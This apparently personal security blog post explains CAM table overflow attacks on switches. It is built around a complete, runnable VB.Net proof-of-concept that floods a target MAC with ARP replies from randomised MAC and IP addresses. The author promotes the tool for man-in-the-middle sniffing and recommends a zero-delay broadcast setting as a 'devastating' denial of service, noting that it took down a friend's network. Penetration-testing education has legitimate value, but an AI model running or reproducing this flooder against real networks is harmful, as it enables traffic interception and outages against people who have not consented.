CAM Table Overflow
Here comes another example on how nokitel can be used for penetration testing.
Ever heard about a CAM-Table-Overflow?
Though so.
It's not a very common exploitation method.
This is a short description quoted from hakipedia,com:
"A switch's CAM table contains network information such as MAC addresses available on physical switch ports and associated VLAN parameters. CAM Table Overflows occur when an influx of MAC addresses are flooded into the table and the CAM table threshold is reached. This causes the switch to act like a hub, flooding the network with traffic out all ports. The flooding caused by a CAM Table Overflow is limited to the source VLAN, thus does not affect other VLANs on the network."
In short; a CAM-Table-Overflow against a switch results in a "degradation of service".
The switch gets downgraded into a hub, and stays that way as long as the CAM-table keeps being overflowed.
If the MAC-flood stop, the degradation will stop as well after a short period of time.
It will eventually turn back into a fully operational mode due to nifty timeouts.
So what's this "degradation of service" good for?
Well, a normal switch routes traffic. Period.
A hub (which the attack makes the switch turn into), broadcasts all traffic to each physical port.
And what's so bad about that?
You got it. MITM! (Man-In-The-Middle)
CAM-Table-Overflow From Hakipedia.com
The cool thing about this attack is that the affected devices (boxes, printers, other routers, etc..) wont get their ARP-caches tampered with.
Which in turn, lowers the risk of firewalls noticing.
Clever huh?
...And here comes the PoC, written in VB.Net with the use of the nokitel library:
Imports nokitel.PCAP 'Make sure your project is running .NET 3.5; and add a reference to nokitel.dll.
Module ARP_CAM_Table_Overflow
Private NIC As Adapters.Adapter = Nothing 'The NIC you will send from.
Private Adapters As New Adapters 'An instance of the NIC-enumuration.
Sub Main()
ShowNICs()
ChooseNIC()
Console.WriteLine("! FF:FF:FF:FF:FF:FF, is the broadcast MAC-address.")
Dim Target As String = vbNullString
Do
Console.WriteLine("< Enter the targets MAC:")
Console.Write("> ")
Target = Console.ReadLine
Loop Until nokitel.Format.RegexMatch(Target, "^(([A-F0-9]){2}:){5}([A-F0-9]){2}$")
Dim Threshold As Integer = &H0
Do
Console.WriteLine("< Enter the numeric timeout in milliseconds:")
Console.Write("> ")
Dim Dummy As String = Console.ReadLine
If IsNumeric(Dummy) Then
Threshold = CInt(Dummy)
Exit Do
End If
Loop
Dim Ethernet As New nokitel.Parse.Ethernet.Ethernet
Dim ARP As New nokitel.Parse.ARP.ARP
Dim Payload(nokitel.Parse.ARP.OFFSET) As Byte
Do
With Ethernet
.DestinationMAC = Target
.SourceMAC = nokitel.Format.RandomMAC
.Type = nokitel.Parse.Ethernet.Ethernet_Types.ARP
End With
With ARP
.HardwareType = nokitel.Parse.ARP.HardwareType.Ethernet
.Operation = nokitel.Parse.ARP.OPCODES.Reply
.ProtocolAddressLength = &H4 'IPv4 Length (4 bytes).
.HardwareAddressLength = &H6 'MAC-address Length (6 bytes).
.ProtocolType = nokitel.Parse.ARP.ProtocolType.IP
.SenderHardwareAddress = nokitel.Format.RandomMAC
.SenderProtocolAddress = nokitel.Format.RandomIP
.TargetHardwareAddress = nokitel.Format.RandomMAC
.TargetProtocolAddress = nokitel.Format.RandomIP
End With
nokitel.Parse.Ethernet.Make(Payload, Ethernet)
nokitel.Parse.ARP.Make(Payload, ARP)
NIC.Send(Payload)
If Threshold > &H0 Then System.Threading.Thread.Sleep(Threshold)
Loop
End Sub
Private Sub ShowNICs()
For Index As Integer = &H0 To Adapters.Enumurate.Length - &H1 'Loop through all available NIC's, and display their stats:
With Adapters.Enumurate(Index)
Console.WriteLine("* ID: " & Index)
Console.WriteLine("* Name: " & .Name)
Console.WriteLine("* Description: " & .Description)
Console.WriteLine("* GUID: " & .GUID)
Console.WriteLine("* Netmask: " & .Netmask)
Console.WriteLine("* Destination: " & .DestinationAddress)
Console.WriteLine("* Broadcast: " & .BroadcastAddress)
Console.WriteLine("* IP: " & .IP)
Console.WriteLine("* MAC: " & .MAC)
Console.WriteLine("* Gateway IP: " & .GatewayIP)
Console.WriteLine("* Gateway MAC: " & .GatewayMAC)
Console.WriteLine("* Supports WiFi: " & CStr(If(.IsWIFI, "Yes", "No")) & ".")
End With
Console.WriteLine()
Next
End Sub
Private Sub ChooseNIC()
Dim ID As String = vbNullString
Do
Console.Write("> ")
ID = Console.ReadLine
If IsNumeric(ID) Then
If ID >= &H0 And ID < Adapters.Enumurate.Length Then
NIC = Adapters.Enumurate(ID) 'Set the NIC-variable to the corresponding index from the "ShowNICs()" output.
If Not NIC.Open(, False) Then
Console.WriteLine("x Unable to hook device!")
End
End If
Exit Do
End If
End If
Loop
End Sub
End Module
There you go!
A precompiled library can be downloaded from here. (Don't forget to set the "target MAC-address" to the switches!)
CAM Table Overflow
I might add. If you set the threshold to 0, and enter the MAC-address of "FF:FF:FF:FF:FF:FF" (Broadcast).
It will turn into a devastating DoS (Denial of Service).
When I first coded this, i let Kasper try it out.
...And to put it short, it killed his whole network.
The Microsoft Windows Vista boxes in his network got null-routed, even after a few reboots and cleared ARP-caches.
...so did his TV.
Enough of this now!
It would be cool if you tried tinkering around with it!
That's about it!
Ciao.
Hey, I'm Fredrik. I'm from Sweden, born 1990, and I got a huge interest for information technology and information security. So far, I've been studying for three years at the Internation IT College of Sweden and one year at the Royal Institute of Technology (Kista, Sweden). I'm currently working at Young / Skilled and as a shareholder of Arctic Security. If you wish to contact me, please email me at h@ackack.net or follow me at twitter @Almroot.